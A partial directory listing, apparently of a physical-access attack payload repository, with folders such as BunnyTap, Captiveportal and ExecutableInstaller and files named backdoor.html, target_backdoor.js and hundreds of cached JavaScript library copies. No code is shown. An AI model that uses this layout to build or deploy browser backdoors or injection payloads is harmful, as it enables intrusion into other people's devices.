├── .gitignore ├── README.md └── payloads ├── library ├── 90sMode │ ├── payload.txt │ ├── r.ps1 │ └── readme.md ├── BunnyTap │ ├── README.md │ ├── alexa1m.sh │ ├── backdoor.html │ ├── backend_server.js │ ├── bunnytap.js │ ├── install.sh │ ├── js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.10.0__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.10.1__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.11.0__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.11.1__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.11.2__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.11.4__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.6.1__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.6__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.7.0__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.7.1__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.8.0__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.8.1__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.8.2__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.8.3__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.9.0__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__0.9.4__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__1.0.0__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__1.0.1__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__1.0.2__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__1.0.3__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__1.0.4__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angular_material__1.0.5__angular-material.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.3__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.4__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.5__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.6__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.7__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.0.8__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.10__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.11__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.12__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.13__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.14__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.15__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.16__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.17__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.18__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.19__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.20__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.21__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.22__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.23__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.24__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.25__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.26__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.27__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.3__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.4__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.5__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.6__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.7__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.8__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.2.9__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.10__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.11__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.12__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.13__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.14__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.15__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.16__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.17__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.18__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.19__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.3__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.4__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.5__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.6__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.7__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.8__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-beta.9__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-rc.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-rc.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-rc.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-rc.3__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-rc.4__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0-rc.5__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.10__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.11__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.12__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.13__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.14__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.15__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.16__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.17__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.3__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.4__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.5__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.6__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.7__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.8__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.3.9__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta.3__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta.4__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta.5__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta6__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-rc.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-rc.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-rc.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.3__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.4__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.5__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.6__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.7__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.8__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.9__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.5.0-beta.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.5.0-beta.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.5.0-beta.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.5.0-rc.0__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.5.0-rc.1__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.5.0-rc.2__angular.min.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.1.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.10.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.10.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.10.2__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.10.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.10.4__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.2.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.2.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.3.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.3.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.3.2__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.4.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.4.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.4.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.4.4__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.4.5__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.4.6__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.5.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.5.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.5.2__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.5.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.5.4__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.6.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.6.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.6.2__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.6.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.2__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.4__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.5__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.6__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.7__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.7.8__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.10__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.2__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.4__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.5__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.6__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.7__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.8__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.8.9__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.9.0__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.9.1__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.9.2__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.9.3__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.9.4__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.9.5__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.9.6__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__dojo__1.9.7__dojo__dojo.js │ │ ├── ajax.googleapis.com__ajax__libs__ext-core__3.0.0__ext-core.js │ │ ├── ajax.googleapis.com__ajax__libs__ext-core__3.1.0__ext-core.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.10.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.10.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.10.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.11.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.11.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.11.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.11.3__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.12.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.12.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.12.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.2.3__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.2.6__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.3.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.3.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.3.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.4.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.4.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.4.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.4.3__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.4.4__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.5.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.5.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.5.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.6.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.6.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.6.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.6.3__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.6.4__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.7.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.7.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.7.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.8.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.8.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.8.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.8.3__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.9.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__1.9.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.0.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.0.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.0.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.0.3__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.1.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.1.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.1.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.1.3__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.1.4__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.2.0__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.2.1__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.2.2__jquery.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquerymobile__1.4.0__jquery.mobile.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquerymobile__1.4.1__jquery.mobile.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquerymobile__1.4.2__jquery.mobile.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquerymobile__1.4.3__jquery.mobile.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquerymobile__1.4.4__jquery.mobile.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jquerymobile__1.4.5__jquery.mobile.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.10.0__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.10.1__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.10.2__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.10.3__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.10.4__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.11.0__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.11.1__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.11.2__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.11.3__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.11.4__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.5.2__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.5.3__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.6.0__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.7.0__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.7.1__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.7.2__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.7.3__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.0__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.10__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.11__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.12__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.13__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.14__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.15__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.16__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.17__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.18__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.19__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.1__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.20__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.21__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.22__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.23__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.24__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.2__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.4__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.5__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.6__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.7__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.8__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.8.9__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.9.0__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.9.1__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__jqueryui__1.9.2__jquery-ui.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.1.1__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.1.2__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.1__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.2__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.3__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.4__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.5__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.3.0__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.3.1__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.3.2__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.0__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.1__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.2__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.3__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.4__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.5__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.5.0__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.5.1__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.5.2__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.6.0__mootools.min.js │ │ ├── ajax.googleapis.com__ajax__libs__prototype__1.6.0.2__prototype.js │ │ ├── ajax.googleapis.com__ajax__libs__prototype__1.6.0.3__prototype.js │ │ ├── ajax.googleapis.com__ajax__libs__prototype__1.6.1.0__prototype.js │ │ ├── ajax.googleapis.com__ajax__libs__prototype__1.7.0.0__prototype.js │ │ ├── ajax.googleapis.com__ajax__libs__prototype__1.7.1.0__prototype.js │ │ ├── ajax.googleapis.com__ajax__libs__prototype__1.7.2.0__prototype.js │ │ ├── ajax.googleapis.com__ajax__libs__prototype__1.7.3.0__prototype.js │ │ ├── ajax.googleapis.com__ajax__libs__scriptaculous__1.8.1__scriptaculous.js │ │ ├── ajax.googleapis.com__ajax__libs__scriptaculous__1.8.2__scriptaculous.js │ │ ├── ajax.googleapis.com__ajax__libs__scriptaculous__1.8.3__scriptaculous.js │ │ ├── ajax.googleapis.com__ajax__libs__scriptaculous__1.9.0__scriptaculous.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.0.0__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.0.1__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.1.0__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.1.1__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.1.2__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.2.0__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.3.0__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.3.1__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__spf__2.3.2__spf.js │ │ ├── ajax.googleapis.com__ajax__libs__swfobject__2.1__swfobject.js │ │ ├── ajax.googleapis.com__ajax__libs__swfobject__2.2__swfobject.js │ │ ├── ajax.googleapis.com__ajax__libs__threejs__r67__three.min.js │ │ ├── ajax.googleapis.com__ajax__libs__threejs__r68__three.min.js │ │ ├── ajax.googleapis.com__ajax__libs__threejs__r69__three.min.js │ │ ├── ajax.googleapis.com__ajax__libs__webfont__1.5.0__webfont.js │ │ ├── ajax.googleapis.com__ajax__libs__webfont__1.5.10__webfont.js │ │ ├── ajax.googleapis.com__ajax__libs__webfont__1.5.18__webfont.js │ │ ├── ajax.googleapis.com__ajax__libs__webfont__1.5.2__webfont.js │ │ ├── ajax.googleapis.com__ajax__libs__webfont__1.5.3__webfont.js │ │ ├── ajax.googleapis.com__ajax__libs__webfont__1.5.6__webfont.js │ │ ├── ajax.googleapis.com__ajax__libs__webfont__1.6.16__webfont.js │ │ └── ajax.googleapis.com__ajax__libs__webfont__2016.__webfont.js │ ├── payload.txt │ ├── target_backdoor.js │ └── target_injected_xhtmljs.html ├── Captiveportal │ ├── README.md │ ├── captiveportal │ ├── payload.txt │ └── portal.html ├── DuckyInstall │ ├── DuckToolkit-1.0.1.tar.gz │ ├── install.sh │ ├── payload.txt │ └── readme.txt ├── DuckyTemplate │ ├── ducky_script.txt │ ├── payload.txt │ └── readme.md ├── ExecutableInstaller │ ├── d.cmd │ ├── e.cmd │ ├── i.vbs │ 